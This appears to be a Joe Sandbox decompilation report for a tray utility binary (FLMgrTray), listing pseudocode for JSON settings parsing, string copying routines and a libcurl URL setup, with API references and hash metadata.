                                                                                        				char _v184;
                                                                                        				void* __ebp;
                                                                                        				signed int _t23;
                                                                                        				signed int _t24;
                                                                                        				void* _t27;
                                                                                        				char* _t31;
                                                                                        				int _t32;
                                                                                        				intOrPtr _t33;
                                                                                        				void* _t36;
                                                                                        				intOrPtr _t49;
                                                                                        				intOrPtr _t50;
                                                                                        				void* _t51;
                                                                                        				void* _t53;
                                                                                        				signed int _t56;
                                                                                        
                                                                                        				_t36 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D436);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t23 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t24 = _t23 ^ _t56;
                                                                                        				_v20 = _t24;
                                                                                        				_push(_t24);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t53 = __ecx;
                                                                                        				_push(0);
                                                                                        				L00176836();
                                                                                        				_v8 = 0;
                                                                                        				L0017686C();
                                                                                        				_push(1);
                                                                                        				_v8 = 1;
                                                                                        				_push( &_v184);
                                                                                        				_t27 = __ecx + 0xac;
                                                                                        				_push(_t27);
                                                                                        				L00176872();
                                                                                        				if(_t27 != 0) {
                                                                                        					_t31 =  &_v44;
                                                                                        					_push(_t31);
                                                                                        					_push("TrayMode");
                                                                                        					L00176866();
                                                                                        					L00176860();
                                                                                        					if(_t31[0x14] >= 0x10) {
                                                                                        						_t31 =  *_t31;
                                                                                        					}
                                                                                        					_t32 = atoi(_t31);
                                                                                        					_t50 = _v24;
                                                                                        					 *(_t53 + 0xc4) = _t32;
                                                                                        					if(_t50 >= 0x10) {
                                                                                        						_t49 = _v44;
                                                                                        						_t51 = _t50 + 1;
                                                                                        						_t33 = _t49;
                                                                                        						if(_t51 >= 0x1000) {
                                                                                        							_t49 =  *((intOrPtr*)(_t49 - 4));
                                                                                        							_t51 = _t51 + 0x23;
                                                                                        							if(_t33 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t51);
                                                                                        						E00175733(_t33, _t49);
                                                                                        					}
                                                                                        				}
                                                                                        				E0016C700(_t36,  &_v160);
                                                                                        				L00176854();
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t56);
                                                                                        			}























                                                                                        0x0016e090
                                                                                        0x0016e093
                                                                                        0x0016e095
                                                                                        0x0016e0a0
                                                                                        0x0016e0a7
                                                                                        0x0016e0ac
                                                                                        0x0016e0ae
                                                                                        0x0016e0b2
                                                                                        0x0016e0b6
                                                                                        0x0016e0bc
                                                                                        0x0016e0be
                                                                                        0x0016e0c6
                                                                                        0x0016e0d1
                                                                                        0x0016e0d8
                                                                                        0x0016e0dd
                                                                                        0x0016e0e5
                                                                                        0x0016e0e9
                                                                                        0x0016e0ea
                                                                                        0x0016e0f0
                                                                                        0x0016e0f7
                                                                                        0x0016e0fe
                                                                                        0x0016e100
                                                                                        0x0016e103
                                                                                        0x0016e104
                                                                                        0x0016e10f
                                                                                        0x0016e116
                                                                                        0x0016e11f
                                                                                        0x0016e121
                                                                                        0x0016e121
                                                                                        0x0016e124
                                                                                        0x0016e12a
                                                                                        0x0016e130
                                                                                        0x0016e139
                                                                                        0x0016e13b
                                                                                        0x0016e13e
                                                                                        0x0016e13f
                                                                                        0x0016e147
                                                                                        0x0016e149
                                                                                        0x0016e14c
                                                                                        0x0016e157
                                                                                        0x0016e159
                                                                                        0x0016e159
                                                                                        0x0016e157
                                                                                        0x0016e15f
                                                                                        0x0016e161
                                                                                        0x0016e166
                                                                                        0x0016e169
                                                                                        0x0016e17c
                                                                                        0x0016e187
                                                                                        0x0016e191
                                                                                        0x0016e1a7

                                                                                        APIs
                                                                                        • ??0Value@Json@@QAE@W4ValueType@1@@Z.JSONCPP(00000000,2C80D730), ref: 0016E0C6
                                                                                        • ??0Reader@Json@@QAE@XZ.JSONCPP(00000000,2C80D730), ref: 0016E0D8
                                                                                        • ?parse@Reader@Json@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVValue@2@_N@Z.JSONCPP(?,00000000,00000001,00000000,2C80D730), ref: 0016E0F7
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(TrayMode,?,?,00000000,00000001,00000000,2C80D730), ref: 0016E10F
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(TrayMode,?,?,00000000,00000001,00000000,2C80D730), ref: 0016E116
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,TrayMode,?,?,00000000,00000001,00000000,2C80D730), ref: 0016E124
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016E159
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP(?,00000000,00000001,00000000,2C80D730), ref: 0016E187
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Json@@$Value@$D@2@@std@@D@std@@Reader@U?$char_traits@V?$allocator@V?$basic_string@$?parse@String@Type@1@@V01@ValueValue@2@__invalid_parameter_noinfo_noreturnatoi
                                                                                        • String ID: TrayMode
                                                                                        • API String ID: 2265589627-4000287391
                                                                                        • Opcode ID: 03711eeb043a3a692f017b435150ac4bdc0fddf4de994a94ed17be476e4bbd04
                                                                                        • Instruction ID: c05ab64190eb7c8863c324507386f47fbdd5d2c17dd59250de86973bba860feb
                                                                                        • Opcode Fuzzy Hash: 03711eeb043a3a692f017b435150ac4bdc0fddf4de994a94ed17be476e4bbd04
                                                                                        • Instruction Fuzzy Hash: 1431F571E00208DFDB18DB64DD55BEDB7B5EF05310F0042A9E41AA72C2DB70AE44CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 66%
                                                                                        			E00182060(void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4, void* _a8, int _a12) {
                                                                                        				signed int _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				signed int _v20;
                                                                                        				int _v24;
                                                                                        				void* __ebp;
                                                                                        				signed int _t98;
                                                                                        				signed int _t103;
                                                                                        				signed int _t126;
                                                                                        				void* _t127;
                                                                                        				signed int _t147;
                                                                                        				signed int _t149;
                                                                                        				intOrPtr _t150;
                                                                                        				signed int _t151;
                                                                                        				signed int _t152;
                                                                                        				int _t153;
                                                                                        				void* _t155;
                                                                                        				void* _t157;
                                                                                        				signed int _t158;
                                                                                        				signed int _t161;
                                                                                        				unsigned int _t164;
                                                                                        				int _t166;
                                                                                        				void* _t169;
                                                                                        				unsigned int _t175;
                                                                                        				void* _t179;
                                                                                        				void* _t180;
                                                                                        				signed int _t190;
                                                                                        				int _t192;
                                                                                        				void* _t194;
                                                                                        				int _t197;
                                                                                        				void* _t199;
                                                                                        				void* _t201;
                                                                                        
                                                                                        				_t161 = __ecx;
                                                                                        				_t147 = _a4;
                                                                                        				_t185 = __ecx;
                                                                                        				_t190 =  *(__ecx + 0x10);
                                                                                        				if(_t190 < _t147) {
                                                                                        					E00164210(_t147, __ecx, __ecx);
                                                                                        					goto L25;
                                                                                        				} else {
                                                                                        					_t175 =  *(__ecx + 0x14);
                                                                                        					_t161 = _a12;
                                                                                        					_v20 = _t175;
                                                                                        					if(_t161 > _t175 - _t190) {
                                                                                        						if(0x7ffffffe - _t190 < _t161) {
                                                                                        							L25:
                                                                                        							E001631F0(_t175);
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t161 + 4)))) + 8))(_v20,  *_t161, _t199);
                                                                                        							return _v20;
                                                                                        						} else {
                                                                                        							_t98 = _t190 + _t161;
                                                                                        							_v16 = _t98;
                                                                                        							_t149 = _t98 | 0x00000007;
                                                                                        							if(_t149 <= 0x7ffffffe) {
                                                                                        								_t164 = _t175 >> 1;
                                                                                        								if(_t175 <= 0x7ffffffe - _t164) {
                                                                                        									_t150 =  <  ? _t164 + _t175 : _t149;
                                                                                        								} else {
                                                                                        									_t150 = 0x7ffffffe;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t150 = 0x7ffffffe;
                                                                                        							}
                                                                                        							_t43 = _t150 + 1; // 0x7fffffff
                                                                                        							_t103 = E00163260(_t175, _t43);
                                                                                        							_t166 = _a12;
                                                                                        							 *((intOrPtr*)(_t185 + 0x14)) = _t150;
                                                                                        							_t151 = _a4;
                                                                                        							_v8 = _t103;
                                                                                        							 *((intOrPtr*)(_t185 + 0x10)) = _v16;
                                                                                        							_a12 = _t166 + _t166;
                                                                                        							_t179 = _v8;
                                                                                        							_t192 = 2 + (_t190 - _t151) * 2;
                                                                                        							_v12 = _t151 + _t151 + _t179;
                                                                                        							_t152 = _v20;
                                                                                        							_v24 = _t192;
                                                                                        							_v16 = _t179 + (_t151 + _t166) * 2;
                                                                                        							if(_t152 < 8) {
                                                                                        								L23:
                                                                                        								_t153 = _a4 + _a4;
                                                                                        								memcpy(_t179, _t185, _t153);
                                                                                        								memcpy(_v12, _a8, _a12);
                                                                                        								memcpy(_v16, _t185 + _t153, _t192);
                                                                                        								 *_t185 = _v8;
                                                                                        								return _t185;
                                                                                        							} else {
                                                                                        								_t194 =  *_t185;
                                                                                        								memcpy(_t179, _t194, _a4 + _a4);
                                                                                        								memcpy(_v12, _a8, _a12);
                                                                                        								_t121 = memcpy(_v16, _t194 + _a4 + _a4, _v24);
                                                                                        								_t155 = 2 + _t152 * 2;
                                                                                        								_t201 = _t201 + 0x24;
                                                                                        								if(_t155 < 0x1000) {
                                                                                        									L21:
                                                                                        									_push(_t155);
                                                                                        									E00175733(_t121, _t194);
                                                                                        									 *_t185 = _v8;
                                                                                        									return _t185;
                                                                                        								} else {
                                                                                        									_t169 =  *(_t194 - 4);
                                                                                        									_t155 = _t155 + 0x23;
                                                                                        									_t192 = _t194 - _t169;
                                                                                        									_t121 = _t192 - 4;
                                                                                        									if(_t192 - 4 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										goto L23;
                                                                                        									} else {
                                                                                        										_t194 = _t169;
                                                                                        										goto L21;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						_v8 = __ecx;
                                                                                        						 *(__ecx + 0x10) = _t190 + _t161;
                                                                                        						_t126 = __ecx;
                                                                                        						if(_t175 >= 8) {
                                                                                        							_t126 =  *__ecx;
                                                                                        							_v8 = _t126;
                                                                                        						}
                                                                                        						_t180 = _a8;
                                                                                        						_t157 = _t126 + _t147 * 2;
                                                                                        						_t127 = _t161 + _t161;
                                                                                        						_v16 = _t127;
                                                                                        						if(_t127 + _t180 <= _t157 || _t180 > _v8 + _t190 * 2) {
                                                                                        							_t158 = _t161;
                                                                                        						} else {
                                                                                        							if(_t157 > _t180) {
                                                                                        								_t158 = _t157 - _t180 >> 1;
                                                                                        							} else {
                                                                                        								_t158 = 0;
                                                                                        							}
                                                                                        						}
                                                                                        						memmove(_v8 + _a4 * 2 + _v16, _v8 + _a4 * 2, 2 + (_t190 - _a4) * 2);
                                                                                        						_t197 = _t158 + _t158;
                                                                                        						memcpy(_v8 + _a4 * 2, _a8, _t197);
                                                                                        						memcpy(_v8 + _a4 * 2 + _t197, _a8 + (_t158 + _a12) * 2, _a12 - _t158 + _a12 - _t158);
                                                                                        						return _t185;
                                                                                        					}
                                                                                        				}
                                                                                        			}



































                                                                                        0x00182060
                                                                                        0x00182067
                                                                                        0x0018206c
                                                                                        0x0018206e
                                                                                        0x00182073
                                                                                        0x0018227b
                                                                                        0x00000000
                                                                                        0x00182079
                                                                                        0x00182079
                                                                                        0x0018207e
                                                                                        0x00182083
                                                                                        0x00182088
                                                                                        0x0018213e
                                                                                        0x00182280
                                                                                        0x00182280
                                                                                        0x00182285
                                                                                        0x00182286
                                                                                        0x00182287
                                                                                        0x00182288
                                                                                        0x00182289
                                                                                        0x0018228a
                                                                                        0x0018228b
                                                                                        0x0018228c
                                                                                        0x0018228d
                                                                                        0x0018228e
                                                                                        0x0018228f
                                                                                        0x0018229f
                                                                                        0x001822a6
                                                                                        0x00182144
                                                                                        0x00182144
                                                                                        0x00182149
                                                                                        0x0018214c
                                                                                        0x00182155
                                                                                        0x00182165
                                                                                        0x0018216b
                                                                                        0x00182179
                                                                                        0x0018216d
                                                                                        0x0018216d
                                                                                        0x0018216d
                                                                                        0x00182157
                                                                                        0x00182157
                                                                                        0x00182157
                                                                                        0x0018217c
                                                                                        0x00182182
                                                                                        0x00182187
                                                                                        0x0018218f
                                                                                        0x00182192
                                                                                        0x00182197
                                                                                        0x0018219d
                                                                                        0x001821a0
                                                                                        0x001821a3
                                                                                        0x001821ab
                                                                                        0x001821b2
                                                                                        0x001821b8
                                                                                        0x001821bb
                                                                                        0x001821c1
                                                                                        0x001821c7
                                                                                        0x0018223f
                                                                                        0x00182242
                                                                                        0x00182248
                                                                                        0x00182256
                                                                                        0x00182263
                                                                                        0x0018226e
                                                                                        0x00182278
                                                                                        0x001821c9
                                                                                        0x001821cc
                                                                                        0x001821d4
                                                                                        0x001821e2
                                                                                        0x001821f6
                                                                                        0x001821fb
                                                                                        0x00182202
                                                                                        0x0018220b
                                                                                        0x0018221f
                                                                                        0x0018221f
                                                                                        0x00182221
                                                                                        0x0018222c
                                                                                        0x00182236
                                                                                        0x0018220d
                                                                                        0x0018220d
                                                                                        0x00182210
                                                                                        0x00182213
                                                                                        0x00182215
                                                                                        0x0018221b
                                                                                        0x00182239
                                                                                        0x00000000
                                                                                        0x0018221d
                                                                                        0x0018221d
                                                                                        0x00000000
                                                                                        0x0018221d
                                                                                        0x0018221b
                                                                                        0x0018220b
                                                                                        0x001821c7
                                                                                        0x0018208e
                                                                                        0x0018208e
                                                                                        0x00182094
                                                                                        0x00182097
                                                                                        0x0018209c
                                                                                        0x0018209e
                                                                                        0x001820a0
                                                                                        0x001820a0
                                                                                        0x001820a3
                                                                                        0x001820a6
                                                                                        0x001820a9
                                                                                        0x001820ac
                                                                                        0x001820b3
                                                                                        0x001820cd
                                                                                        0x001820bf
                                                                                        0x001820c1
                                                                                        0x001820c9
                                                                                        0x001820c3
                                                                                        0x001820c3
                                                                                        0x001820c3
                                                                                        0x001820c1
                                                                                        0x001820e7
                                                                                        0x001820ef
                                                                                        0x001820fd
                                                                                        0x00182122
                                                                                        0x00182132
                                                                                        0x00182132
                                                                                        0x00182088

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(0000000E,?,?,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 001820E7
                                                                                        • memcpy.VCRUNTIME140(00000000,0000000E,?,0000000E,?,?,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 001820FD
                                                                                        • memcpy.VCRUNTIME140(00000001,00000001,00000001,00000000,0000000E,?,0000000E,?,?,?,00000001,?,00190FA4,00000001,0000000E,?), ref: 00182122
                                                                                        • memcpy.VCRUNTIME140(?,?,0000000E,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 001821D4
                                                                                        • memcpy.VCRUNTIME140(?,0000000E,00000001,?,?,0000000E,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 001821E2
                                                                                        • memcpy.VCRUNTIME140(0000000E,00000000,00190FA4,?,0000000E,00000001,?,?,0000000E,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E), ref: 001821F6
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 00182239
                                                                                        • memcpy.VCRUNTIME140(?,?,00000001,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 00182248
                                                                                        • memcpy.VCRUNTIME140(?,0000000E,00000001,?,?,00000001,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E,?,?), ref: 00182256
                                                                                        • memcpy.VCRUNTIME140(0000000E,00000000,?,?,0000000E,00000001,?,?,00000001,7FFFFFFF,?,00000001,?,00190FA4,00000001,0000000E), ref: 00182263
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnmemmove
                                                                                        • String ID:
                                                                                        • API String ID: 2744272510-0
                                                                                        • Opcode ID: 78f21c8e7965fb0f341aef9323dc4a385152845d9c0aeb65cdc1d0a41e1451a4
                                                                                        • Instruction ID: 40d18655000651d0ac07bf88c6bc0efa2ea52665b9332ce6045ade0b9d2a18d9
                                                                                        • Opcode Fuzzy Hash: 78f21c8e7965fb0f341aef9323dc4a385152845d9c0aeb65cdc1d0a41e1451a4
                                                                                        • Instruction Fuzzy Hash: A5718475A00209AFCB15EFA8D8C489E77B9FF89310B20416AE915D7221E731EB55CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 45%
                                                                                        			E00167960(int __ebx, int __ecx, int _a4, void* _a8, void* _a12) {
                                                                                        				unsigned int _v8;
                                                                                        				void* _v12;
                                                                                        				void _v16;
                                                                                        				int _v20;
                                                                                        				signed int _v24;
                                                                                        				unsigned int _v28;
                                                                                        				signed int _v32;
                                                                                        				char _v36;
                                                                                        				signed int _v40;
                                                                                        				void* _v48;
                                                                                        				unsigned int _v52;
                                                                                        				signed int _v56;
                                                                                        				signed int _v72;
                                                                                        				unsigned int _v76;
                                                                                        				signed int _v80;
                                                                                        				char _v96;
                                                                                        				unsigned int _v100;
                                                                                        				signed int _v104;
                                                                                        				char _v120;
                                                                                        				char _v124;
                                                                                        				unsigned int _v128;
                                                                                        				signed int _v132;
                                                                                        				char _v148;
                                                                                        				unsigned int _v152;
                                                                                        				signed int _v156;
                                                                                        				char _v172;
                                                                                        				signed int _v176;
                                                                                        				char _v177;
                                                                                        				signed int _v184;
                                                                                        				signed int _v188;
                                                                                        				void* _v192;
                                                                                        				void* _v196;
                                                                                        				intOrPtr* _v200;
                                                                                        				void* _v204;
                                                                                        				signed int _v208;
                                                                                        				void* _v212;
                                                                                        				signed int _v216;
                                                                                        				signed int _v220;
                                                                                        				void* _v224;
                                                                                        				void* _v228;
                                                                                        				intOrPtr _v232;
                                                                                        				char _v236;
                                                                                        				void* _v240;
                                                                                        				signed int _v248;
                                                                                        				char _v252;
                                                                                        				signed int _v260;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t290;
                                                                                        				signed int _t291;
                                                                                        				void* _t293;
                                                                                        				void _t294;
                                                                                        				int _t295;
                                                                                        				void* _t296;
                                                                                        				void* _t297;
                                                                                        				void* _t300;
                                                                                        				unsigned int _t308;
                                                                                        				char _t313;
                                                                                        				void* _t314;
                                                                                        				void* _t318;
                                                                                        				void* _t328;
                                                                                        				void* _t352;
                                                                                        				void* _t357;
                                                                                        				int _t360;
                                                                                        				signed int _t364;
                                                                                        				void** _t367;
                                                                                        				intOrPtr _t380;
                                                                                        				void _t383;
                                                                                        				void* _t386;
                                                                                        				unsigned int _t391;
                                                                                        				void* _t394;
                                                                                        				void* _t395;
                                                                                        				signed int _t397;
                                                                                        				intOrPtr* _t401;
                                                                                        				void _t405;
                                                                                        				signed int _t408;
                                                                                        				char* _t409;
                                                                                        				void* _t420;
                                                                                        				int _t424;
                                                                                        				void* _t428;
                                                                                        				int _t441;
                                                                                        				void* _t466;
                                                                                        				void* _t467;
                                                                                        				void* _t470;
                                                                                        				char* _t476;
                                                                                        				intOrPtr* _t478;
                                                                                        				void _t490;
                                                                                        				void* _t493;
                                                                                        				unsigned int _t494;
                                                                                        				signed int _t499;
                                                                                        				void* _t500;
                                                                                        				unsigned int _t501;
                                                                                        				void* _t502;
                                                                                        				void* _t504;
                                                                                        				signed int _t505;
                                                                                        				intOrPtr _t510;
                                                                                        				signed int _t513;
                                                                                        				void* _t514;
                                                                                        				void* _t517;
                                                                                        				void* _t520;
                                                                                        				unsigned int _t521;
                                                                                        				void* _t522;
                                                                                        				intOrPtr* _t523;
                                                                                        				unsigned int _t526;
                                                                                        				unsigned int _t527;
                                                                                        				unsigned int _t529;
                                                                                        				void* _t530;
                                                                                        				void* _t531;
                                                                                        				intOrPtr _t533;
                                                                                        				signed int _t534;
                                                                                        				void* _t535;
                                                                                        				unsigned int _t536;
                                                                                        				void* _t537;
                                                                                        				intOrPtr _t538;
                                                                                        				signed int _t540;
                                                                                        				signed int _t541;
                                                                                        				int _t543;
                                                                                        				void* _t545;
                                                                                        				int _t549;
                                                                                        				void* _t552;
                                                                                        				void* _t553;
                                                                                        				signed int _t554;
                                                                                        				intOrPtr* _t555;
                                                                                        				void* _t556;
                                                                                        				void* _t558;
                                                                                        				intOrPtr* _t559;
                                                                                        				char _t561;
                                                                                        				signed int _t562;
                                                                                        				signed int _t569;
                                                                                        				signed int _t570;
                                                                                        				void* _t571;
                                                                                        				void* _t572;
                                                                                        				void* _t575;
                                                                                        				void* _t576;
                                                                                        
                                                                                        				_t461 = __ebx;
                                                                                        				_push(__ebx);
                                                                                        				_t552 = __ecx;
                                                                                        				_t466 = _a4;
                                                                                        				_t533 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                        				if(_t533 < _t466) {
                                                                                        					E00164210(__ebx, _t466, _t533);
                                                                                        					goto L25;
                                                                                        				} else {
                                                                                        					_t521 =  *(__ecx + 0x14);
                                                                                        					_t461 = _a12;
                                                                                        					_v8 = _t521;
                                                                                        					if(_t461 > _t521 - _t533) {
                                                                                        						__eflags = 0x7fffffff - _t533 - _t461;
                                                                                        						if(0x7fffffff - _t533 < _t461) {
                                                                                        							L25:
                                                                                        							E001631F0(_t521);
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							_t569 = _t570;
                                                                                        							_push(0xffffffff);
                                                                                        							_push(E0018CF6E);
                                                                                        							_push( *[fs:0x0]);
                                                                                        							_t571 = _t570 - 0xe8;
                                                                                        							_t290 =  *0x19d05c; // 0x2c80d730
                                                                                        							_t291 = _t290 ^ _t569;
                                                                                        							_v40 = _t291;
                                                                                        							_push(_t552);
                                                                                        							_push(_t533);
                                                                                        							_push(_t291);
                                                                                        							 *[fs:0x0] =  &_v36;
                                                                                        							_t293 = _t466;
                                                                                        							_v192 = _t293;
                                                                                        							_t534 = _v16;
                                                                                        							_t553 = _t293 + 0x30;
                                                                                        							_v260 = _t534;
                                                                                        							_v216 = _t534;
                                                                                        							_t535 = _v12;
                                                                                        							_v248 = 0;
                                                                                        							__eflags =  *(_t293 + 0x58);
                                                                                        							_v212 = _t535;
                                                                                        							if( *(_t293 + 0x58) == 0) {
                                                                                        								__eflags =  *(_t553 + 0x14) - 0x10;
                                                                                        								_t294 = _t553;
                                                                                        								if( *(_t553 + 0x14) >= 0x10) {
                                                                                        									_t294 =  *_t553;
                                                                                        								}
                                                                                        								__imp__curl_easy_setopt(_t535, 0x2712, _t294);
                                                                                        								_t572 = _t571 + 0xc;
                                                                                        							} else {
                                                                                        								_v12 = 0;
                                                                                        								_v56 = 0;
                                                                                        								_v52 = 0xf;
                                                                                        								_v72 = 0;
                                                                                        								_v232 = 2;
                                                                                        								E001683E0(_t461,  &_v72, _t535, _t553,  *(_t553 + 0x10) + 1);
                                                                                        								__eflags =  *(_t553 + 0x14) - 0x10;
                                                                                        								_t405 = _t553;
                                                                                        								if( *(_t553 + 0x14) >= 0x10) {
                                                                                        									_t405 =  *_t553;
                                                                                        								}
                                                                                        								_push( *(_t553 + 0x10));
                                                                                        								E001661B0( &_v72, _t405);
                                                                                        								_push(1);
                                                                                        								E001661B0( &_v72, "?");
                                                                                        								_t408 = _v176;
                                                                                        								__eflags =  *((intOrPtr*)(_t408 + 0x5c)) - 0x10;
                                                                                        								_t510 = _t408 + 0x48;
                                                                                        								if( *((intOrPtr*)(_t408 + 0x5c)) >= 0x10) {
                                                                                        									_t510 =  *((intOrPtr*)(_t408 + 0x48));
                                                                                        								}
                                                                                        								_push( *((intOrPtr*)(_t408 + 0x58)));
                                                                                        								_t409 = E001661B0( &_v72, _t510);
                                                                                        								_v12 = 0xffffffff;
                                                                                        								asm("movups xmm0, [eax]");
                                                                                        								asm("movups [ebp-0x28], xmm0");
                                                                                        								asm("movq xmm0, [eax+0x10]");
                                                                                        								asm("movq [ebp-0x18], xmm0");
                                                                                        								 *(_t409 + 0x10) = 0;
                                                                                        								 *(_t409 + 0x14) = 0xf;
                                                                                        								 *_t409 = 0;
                                                                                        								_t529 = _v52;
                                                                                        								__eflags = _t529 - 0x10;
                                                                                        								if(_t529 >= 0x10) {
                                                                                        									_t499 = _v72;
                                                                                        									_t527 = _t529 + 1;
                                                                                        									_t374 = _t499;
                                                                                        									__eflags = _t527 - 0x1000;
                                                                                        									if(_t527 >= 0x1000) {
                                                                                        										_t499 =  *(_t499 - 4);
                                                                                        										_t527 = _t527 + 0x23;
                                                                                        										_t374 = _t374 - _t499 + 0xfffffffc;
                                                                                        										__eflags = _t374 - 0x1f;
                                                                                        										if(_t374 > 0x1f) {
                                                                                        											L34:
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										}
                                                                                        									}
                                                                                        									_push(_t527);
                                                                                        									E00175733(_t374, _t499);
                                                                                        									_t571 = _t576 + 8;
                                                                                        								}
                                                                                        								__eflags = _v28 - 0x10;
                                                                                        								_t379 =  >=  ? _v48 :  &_v48;
                                                                                        								__imp__curl_easy_setopt(_t536, 0x2712,  >=  ? _v48 :  &_v48);
                                                                                        								_t521 = _v28;
                                                                                        								_t572 = _t571 + 0xc;
                                                                                        								__eflags = _t521 - 0x10;
                                                                                        								if(_t521 >= 0x10) {
                                                                                        									_t500 = _v48;
                                                                                        									_t521 = _t521 + 1;
                                                                                        									_t380 = _t500;
                                                                                        									__eflags = _t521 - 0x1000;
                                                                                        									if(_t521 >= 0x1000) {
                                                                                        										_t500 =  *((intOrPtr*)(_t500 - 4));
                                                                                        										_t521 = _t521 + 0x23;
                                                                                        										_t380 = _t380 - _t500 + 0xfffffffc;
                                                                                        										__eflags = _t380 - 0x1f;
                                                                                        										if(_t380 > 0x1f) {
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										}
                                                                                        									}
                                                                                        									_push(_t521);
                                                                                        									E00175733(_t380, _t500);
                                                                                        									_t572 = _t572 + 8;
                                                                                        								}
                                                                                        							}
                                                                                        							__eflags =  *(_t553 + 0x14) - 0x10;
                                                                                        							_t467 = _t553;
                                                                                        							_v192 = _t553;
                                                                                        							if( *(_t553 + 0x14) >= 0x10) {
                                                                                        								_t467 =  *_t553;
                                                                                        								_v192 = _t467;
                                                                                        							}
                                                                                        							_t295 =  *(_t553 + 0x10);
                                                                                        							__eflags = _t295;
                                                                                        							if(_t295 == 0) {
                                                                                        								L49:
                                                                                        								_t296 = _t295 | 0xffffffff;
                                                                                        								__eflags = _t296;
                                                                                        							} else {
                                                                                        								_t295 = memchr(_t467, 0x3a, _t295);
                                                                                        								_t572 = _t572 + 0xc;
                                                                                        								__eflags = _t295;
                                                                                        								if(_t295 == 0) {
                                                                                        									goto L49;
                                                                                        								} else {
                                                                                        									_t296 = _t295 - _v192;
                                                                                        								}
                                                                                        							}
                                                                                        							__eflags =  *(_t553 + 0x10) - _t296;
                                                                                        							_v80 = 0;
                                                                                        							_t297 =  <  ?  *(_t553 + 0x10) : _t296;
                                                                                        							__eflags =  *(_t553 + 0x14) - 0x10;
                                                                                        							_v76 = 0xf;
                                                                                        							_v96 = 0;
